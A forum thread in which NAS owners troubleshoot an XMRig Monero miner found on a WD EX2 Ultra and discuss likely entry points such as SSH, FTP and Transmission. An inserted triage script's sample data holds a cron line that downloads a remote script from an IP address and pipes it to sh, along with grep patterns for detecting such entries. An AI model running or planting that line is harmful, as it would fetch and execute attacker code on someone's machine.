XMRIG process using massive CPU power! (miner for Monero?)

Hi,
My EX2 Ultra was working really hard so I checked the running processes and found a process called XMRIG. A short Google search revealed this: “XMRig is a miner specifically, a type of threat that is used to make money at the expense of computer users by using the infected computer users to mine Monero, a cryptocurrency. XMRig can cause a computer to overheat and perform poorly, since XMRig uses additional system resources, taking these away from the victim.” This doesn’t sound good… I turned off the FTP access and changed passwords. It seems to have stopped now.
How can I (through SSH for example) check whether there is a real threat?

What’s the output of the commands below?

ps -fe | grep -i xmrig
crontab -l

12075 root 2592 S grep -i xmrig
and
0 3 * * * /usr/sbin/daily_log_upload.sh &
0 3 * * * /usr/sbin/traceroute_wd.sh &
*/30 * * * * /usr/sbin/quota_monitor &
0 */4 * * * /usr/sbin/rlog -s /usr/local/modules/files/syslog_rotate.conf
01 */8 * * * [ -f /etc/init.d/atop ] && /etc/init.d/atop rotate
30 0 * * * /usr/local/sbin/ssl_cert_job.sh start > /var/log/ssl_cert_cron.out 2>&1
0 0 * * * random_chk_central -s &
30 0 * * 1 logwdmsg -e &
0 3 * * * logwdmsg -o &
01 3 * * * /usr/local/sbin/LogDataSize.sh
00 3 * * * /usr/sbin/wd_rotate.sh
30 0 * * 1 /usr/sbin/wdappmgr_log_stats.py > /dev/null 2>&1 &
30 2 * * * /usr/sbin/stime&
0 3 * * * wd_crontab.sh&
0 4 * * * auto_fw -a -c&
0 0 * * * auto_clear_recycle_bin.sh &
30 3 * * * /usr/sbin/chk_wfs_download&
0 0 * * * /bin/sh /usr/local/config/mycloud &
*/15 * * * * ga_cron.sh quarter &
26 4 * * * ga_cron.sh daily &
0 0 * * * random_check -s &
0 0 * * * expire.sh
9 3 * * * /usr/local/sbin/PullWdlogConfig.sh
18 14 * * * auto_fw -c 1 &

• sysinfo_update.sh
0 3 * * 1 getHddWhiteList.sh

So, I don’t see any xmrig running or anything different in your crontab.
Where did you see it running?

You are not alone…

Do you have any other details?
Did it happen after you installed something?
Do you use Transmission?
Was your NAS updated when it happened?
What ports are being redirected to your NAS?

Did it happen after you installed something?
Not 100% sure, but I do not think so.

Do you use Transmission?
yes

Was your NAS updated when it happened?
yes, latest available version of firmware, 2.31.204

What ports are being redirected to your NAS?
9092 and 53934 - Transmission web interface and incoming connection port
32400 - plex
22 - SSH
8186 - PlexPy
443 for WD web interface

I just realized that my NAS has no way to check for login failures.
In your case, the main attack vectors would be SSH or Transmission, in case you downloaded something malicious. Unfortunately, the logs available in /var/log are useless. Just make sure your sshd password is strong because you could be a victim of a brute force attack. Ideally, your ssh service should not be available to the internet.
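The checks suggested in this thread (look for the miner in `ps -fe`, look for anything odd in `crontab -l`) as a small POSIX sh triage script. This is an added example, not something posted in the thread or shipped with the NAS firmware; the list of miner process names and the patterns for suspicious cron entries are my assumptions, and the ps/crontab samples are constructed so the script runs stand-alone.

```shell
#!/bin/sh
# Added example (not from the thread): triage helpers for a NAS suspected of
# running an unwanted miner. Both functions read text on stdin, so they accept
# live output (ps -fe, crontab -l) as well as the constructed samples below.

# Print ps lines whose command mentions a known miner binary name, dropping the
# grep/pipeline process itself so it is not reported as a hit. The name list is
# an assumption; extend it with whatever your AV vendor reports.
find_miner_processes() {
    grep -i -E 'xmrig|minerd|cpuminer' | grep -v -E 'grep|find_miner'
}

# Print crontab entries that execute from temp/writable locations, decode base64
# inline, or pipe a download straight into a shell. Stock WD entries live under
# /usr/sbin or /usr/local and match none of these patterns.
find_suspicious_cron() {
    grep -v '^#' | grep -E '/tmp/|/dev/shm/|/var/tmp/|base64 -d|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'
}

# Constructed sample data (not captured from a real device).
SAMPLE_PS='UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Jan01 ? 00:00:01 init
root 4711 1 99 10:02 ? 01:12:33 /tmp/.x/xmrig --config=/tmp/.x/config.json
root 12075 1 0 10:05 pts/0 00:00:00 grep -i xmrig
root 800 1 0 Jan01 ? 00:00:00 /usr/sbin/transmission-daemon'

SAMPLE_CRON='0 3 * * * /usr/sbin/daily_log_upload.sh &
*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh
0 4 * * * auto_fw -a -c&
@reboot /dev/shm/.cache/run'

# Counting wrappers so the result can be checked, not only eyeballed.
count_miner_processes() { printf '%s\n' "$SAMPLE_PS" | find_miner_processes | wc -l | tr -d ' '; }
count_suspicious_cron() { printf '%s\n' "$SAMPLE_CRON" | find_suspicious_cron | wc -l | tr -d ' '; }

# On the NAS itself, over SSH:
#   ps -fe | find_miner_processes
#   crontab -l | find_suspicious_cron
```

A clean box prints nothing from either pipeline; any hit is worth pulling the full command line and the file it points at before killing it, so you keep evidence of where it came from.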

I think it has… /var/log/user.log. No SSH however. dmesg output has some info on SSH brute force attempts but I was not able to sort out the timestamps so no idea when that was.

Anyway, I changed the admin and ssh passwords to 16-character random ones so it should be a bit safer. I will set up a VPN for the Transmission and server web interfaces, but the others (torrent and Plex) can't be helped. It just kills me that I do not know where it got through…

I had FTP open when I had it. I turned it off and also set the SSH password to a 16b random one. It doesn't seem to pop up anymore now.